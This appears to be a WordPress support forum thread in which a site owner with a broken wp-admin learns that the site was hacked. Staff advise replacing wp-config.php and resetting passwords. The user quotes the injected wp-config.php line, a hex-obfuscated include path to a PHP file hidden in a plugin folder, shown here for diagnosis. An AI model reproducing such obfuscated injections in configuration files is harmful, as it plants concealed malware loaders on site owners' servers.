Hi there,
Previously my site was fully working, and recently error codes starting popping up on the top header and I can also not access my wp-admin page…
I tried to delete conflict plugin from folder and also tried to deactivate plugin via phpmyadmin.
Thanks…
March 27, 2017 at 8:31 am #1421598Hi There,
Seems there is a plugin conflict with popup-by-supsystic
Please acess your site via FTP and remove the plugin from the folder wp-content/plugins.
Hope it helps
Joao
March 27, 2017 at 8:55 am #1421624I already deleted the plugin via FTP.
March 27, 2017 at 9:39 am #1421717Meaning I already deleted the plugin within that sub-folder and I get same errors
March 27, 2017 at 9:50 am #1421730You have an issue with your wp-config.php. Please check if you have code in that is causing the problem.
Also, deactivate all third party plugins and remove all customizations then test again.
Thanks.
March 27, 2017 at 10:05 am #1421759The error code points to wp-config.php line 54 which shows following code:
* You can */”\x2fhom\x652/x\x64ale\x7809/\x70ubl\x69c_h\x74ml/\x61lex\x69nwe\x64din\x67lan\x64.co\x6d/wp\x2dcon\x74ent\x2fplu\x67ins\x2fpop\x75p-b\x79-su\x70sys\x74ic/\x63las\x73es/\x68elp\x65rs/\x70age\x2ephp”;/*have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/I tried to delete and it generates more errors, I reverted back…please help!
March 27, 2017 at 10:19 am #1421776Hi there,
You could try testing for a plugin conflict. You can do this by deactivating all third party plugins, and seeing if the problem remains. If it’s fixed, you’ll know a plugin caused the problem, and you can narrow down which one by reactivating them one at a time.
If the issue persists, would you mind providing us with login credentials so we can take a closer look? To do this, you can make a post with the following info:
– Link to your site
– WordPress Admin username / password
– FTP credentialsDon’t forget to select Set as private reply. This ensures your information is only visible to our staff.

I have checked your wp-config.php file and it seems like your site was hacked as there are some strings added on the file that are not supposed to be there.
I suggest that you restore the site from a previous backup and make sure that the FTP/CPanel and admin password are reset to stronger ones.
Hope this helps.
March 27, 2017 at 11:11 am #1421830I unfortunately don’t have a backup of this particular site. Any ideas on how to restore the wp-config.php file?
March 27, 2017 at 12:17 pm #1421912HI There,
You can download a fresh version of WordPress and replace the file.
Have in mind you have to add your database information in Wp-Config-sample (file that comes with WP) and also rename it from wp-config-sample to wp-config.
Hope it helps
